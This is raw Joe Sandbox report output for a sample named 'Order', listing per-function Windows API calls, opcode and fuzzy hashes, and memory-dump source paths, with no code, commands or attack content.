                      • Opcode ID: 3c1d31c8affcdc6d165275096a5574497656667687e3c5a1ea8ed31f7b3a2118
                      • Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
                      • Opcode Fuzzy Hash: 3c1d31c8affcdc6d165275096a5574497656667687e3c5a1ea8ed31f7b3a2118
                      • Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E
                      APIs
                      • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,77735E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
                      • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
                      • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
                      • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                      • String ID: InitOnceExecuteOnce$Kernel32.dll
                      • API String ID: 2918862794-1339284965
                      • Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                      • Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
                      • Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                      • Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D
                      APIs
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                      • GetCurrentThreadId.KERNEL32 ref: 0040951F
                      • IsWindowVisible.USER32(?), ref: 00409526
                        • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                      • GetCurrentThreadId.KERNEL32 ref: 00409543
                      • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                      • GetForegroundWindow.USER32 ref: 0040955E
                      • IsWindowEnabled.USER32(?), ref: 00409569
                      • EnableWindow.USER32(?,00000000), ref: 00409579
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                      • String ID:
                      • API String ID: 3383493704-0
                      • Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                      • Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
                      • Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                      • Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D
                      APIs
                      • DestroyWindow.USER32(?), ref: 00408EED
                      • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                      • GetWindowTextLengthW.USER32 ref: 00408F0A
                      • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                      • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                      • DestroyWindow.USER32(?), ref: 00408F3D
                      • UnregisterClassW.USER32 ref: 00408F53
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                      • String ID:
                      • API String ID: 2895088630-0
                      • Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                      • Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
                      • Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                      • Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58
                      APIs
                      • EnumWindows.USER32(00409507,?), ref: 0040959B
                      • GetCurrentThreadId.KERNEL32 ref: 004095B3
                      • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                      • GetCurrentThreadId.KERNEL32 ref: 004095EF
                      • EnableWindow.USER32(?,00000001), ref: 00409605
                      • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Window$CurrentThread$EnableEnumWindows
                      • String ID:
                      • API String ID: 2527101397-0
                      • Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                      • Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
                      • Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                      • Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18
                      APIs
                      • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
                      • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
                      • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
                      • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocValue$Heap
                      • String ID:
                      • API String ID: 2472784365-0
                      • Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                      • Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
                      • Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                      • Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC
                      APIs
                      • UnregisterWait.KERNEL32(?), ref: 0041200E
                      • CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
                      • EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
                      • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
                      • HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                      • String ID:
                      • API String ID: 4204870694-0
                      • Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                      • Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
                      • Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                      • Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8
                      APIs
                      • wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                      • memmove.MSVCRT ref: 004058E1
                      • wcsncpy.MSVCRT ref: 004058F9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: memmovewcsncmpwcsncpy
                      • String ID: $0A$$0A
                      • API String ID: 1452150355-167650565
                      • Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                      • Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
                      • Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                      • Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA
                      APIs
                      • memset.MSVCRT ref: 00405562
                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcmemset
                      • String ID: RtlGetVersion$ntdll.dll
                      • API String ID: 3137504439-1489217083
                      • Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                      • Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
                      • Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                      • Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD
                      APIs
                      • wcslen.MSVCRT ref: 0040A0AB
                      • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
                      • wcscpy.MSVCRT ref: 0040A0CC
                      • memset.MSVCRT ref: 0040A0FA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocHeapmemsetwcscpywcslen
                      • String ID: $0A
                      • API String ID: 1807340688-513306843
                      • Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                      • Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
                      • Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                      • Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A
                      APIs
                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                      • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                      • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                      • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Heap$Free$Alloc
                      • String ID: $0A
                      • API String ID: 3901518246-513306843
                      • Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                      • Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
                      • Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                      • Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8
                      APIs
                      • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02319778), ref: 004054AB
                      • EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                      • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                      • CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                        • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                      • LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                      • String ID:
                      • API String ID: 3708593966-0
                      • Opcode ID: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                      • Instruction ID: 0c8983fff82f944e714e95dc609c427016460782395ad7ea9b381996daa8850a
                      • Opcode Fuzzy Hash: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                      • Instruction Fuzzy Hash: 6E110632145604BFC3015F54EC05ED7BBB9EF45752721846BF800972A0EB75A8508F6D
                      APIs
                      • EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                      • LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                        • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                      • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
                      • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                      • String ID:
                      • API String ID: 3171405041-0
                      • Opcode ID: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                      • Instruction ID: 8e0b58a532cd0764c064264ab0afec864f9344a56e81b99afb7742a3bcd9c4dc
                      • Opcode Fuzzy Hash: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                      • Instruction Fuzzy Hash: 80112B71501601AFC7209F55DC48B96BBB5FF49311F10843EA45A936A1D738A844CF98
                      APIs
                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02310000,00000000,?,?), ref: 0040E2C7
                      • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                      • wcscmp.MSVCRT ref: 004096C2
                      • memmove.MSVCRT ref: 004096DA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocFileHeapModuleNameValuememmovewcscmp
                      • String ID: \\?\
                      • API String ID: 3734239354-4282027825
                      • Opcode ID: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                      • Instruction ID: 273bc576c06434c2caee33e7ea90b93358419674725e30c46c8a7bea9ec705d9
                      • Opcode Fuzzy Hash: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                      • Instruction Fuzzy Hash: BBF0E2B31006017BC210677BDC85CAB7EACEB853747000A3FF515D24D2EA38D82496B8
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                      • Instruction ID: 0935afcf37e6329c3ac2d0f56793f6a9f9fc9668031c2f15978d8007e640a3dc
                      • Opcode Fuzzy Hash: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                      • Instruction Fuzzy Hash: 322103317506083BE524AA29DC86F9F738CDB81708F40063EF241BA2C1CA79E54947AE
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocHeapwcsncpy
                      • String ID:
                      • API String ID: 2304708654-0
                      • Opcode ID: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                      • Instruction ID: a3f43ae3cc8438659badc3904afd778ac5f48c872593279c616423bb3bd2bb8e
                      • Opcode Fuzzy Hash: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                      • Instruction Fuzzy Hash: 6D51AD34508B059BDB209F28D844A6B77F4FF84348F544A2EF885A72D0E778E915CB99
                      APIs
                      • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
                      • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
